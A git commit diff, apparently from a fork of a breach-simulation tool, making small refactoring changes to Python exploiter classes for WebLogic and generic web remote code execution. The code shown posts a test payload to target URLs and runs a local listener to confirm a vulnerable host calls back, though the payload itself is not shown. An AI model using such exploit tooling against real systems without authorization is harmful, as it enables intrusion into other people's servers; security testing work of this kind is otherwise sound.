forked from p15670423/monkey
Syntactic, small changes to weblogic and web_rce
This commit is contained in:
parent
6073e9f677
commit
7ab22bb3e9
|
@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
|
||||||
exploit_config['upload_commands'] = None
|
exploit_config['upload_commands'] = None
|
||||||
|
|
||||||
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
|
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
|
||||||
exploit_config['url_extensions'] = None
|
exploit_config['url_extensions'] = []
|
||||||
|
|
||||||
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
|
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
|
||||||
exploit_config['stop_checking_urls'] = False
|
exploit_config['stop_checking_urls'] = False
|
||||||
|
|
|
@ -69,7 +69,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
print(e)
|
print(e)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def add_vulnerable_urls(self, urls):
|
def add_vulnerable_urls(self, urls, stop_checking=False):
|
||||||
"""
|
"""
|
||||||
Overrides parent method to use listener server
|
Overrides parent method to use listener server
|
||||||
"""
|
"""
|
||||||
|
@ -78,7 +78,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
exploitable = False
|
exploitable = False
|
||||||
|
|
||||||
for url in urls:
|
for url in urls:
|
||||||
if self.check_if_exploitable(url, httpd):
|
if self.check_if_exploitable_weblogic(url, httpd):
|
||||||
exploitable = True
|
exploitable = True
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -95,8 +95,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
|
|
||||||
self._stop_http_server(httpd, lock)
|
self._stop_http_server(httpd, lock)
|
||||||
|
|
||||||
def check_if_exploitable(self, url, httpd):
|
def check_if_exploitable_weblogic(self, url, httpd):
|
||||||
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
|
||||||
try:
|
try:
|
||||||
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
||||||
except exceptions.ReadTimeout:
|
except exceptions.ReadTimeout:
|
||||||
|
@ -120,7 +120,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
lock.acquire()
|
lock.acquire()
|
||||||
return httpd, lock
|
return httpd, lock
|
||||||
|
|
||||||
def _stop_http_server(self, httpd, lock):
|
@staticmethod
|
||||||
|
def _stop_http_server(httpd, lock):
|
||||||
lock.release()
|
lock.release()
|
||||||
httpd.join(SERVER_TIMEOUT)
|
httpd.join(SERVER_TIMEOUT)
|
||||||
httpd.stop()
|
httpd.stop()
|
||||||
|
@ -194,8 +195,8 @@ class WebLogicExploiter(WebRCE):
|
||||||
we determine if we can exploit by either getting a GET request from host or not.
|
we determine if we can exploit by either getting a GET request from host or not.
|
||||||
"""
|
"""
|
||||||
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
def __init__(self, local_ip, local_port, lock, max_requests=1):
|
||||||
self._local_ip = local_ip
|
self.local_ip = local_ip
|
||||||
self._local_port = local_port
|
self.local_port = local_port
|
||||||
self.get_requests = 0
|
self.get_requests = 0
|
||||||
self.max_requests = max_requests
|
self.max_requests = max_requests
|
||||||
self._stopped = False
|
self._stopped = False
|
||||||
|
@ -210,7 +211,7 @@ class WebLogicExploiter(WebRCE):
|
||||||
LOG.info('Server received a request from vulnerable machine')
|
LOG.info('Server received a request from vulnerable machine')
|
||||||
self.get_requests += 1
|
self.get_requests += 1
|
||||||
LOG.info('Server waiting for exploited machine request...')
|
LOG.info('Server waiting for exploited machine request...')
|
||||||
httpd = HTTPServer((self._local_ip, self._local_port), S)
|
httpd = HTTPServer((self.local_ip, self.local_port), S)
|
||||||
httpd.daemon = True
|
httpd.daemon = True
|
||||||
self.lock.release()
|
self.lock.release()
|
||||||
while not self._stopped and self.get_requests < self.max_requests:
|
while not self._stopped and self.get_requests < self.max_requests:
|
||||||
|
|
Loading…
Reference in New Issue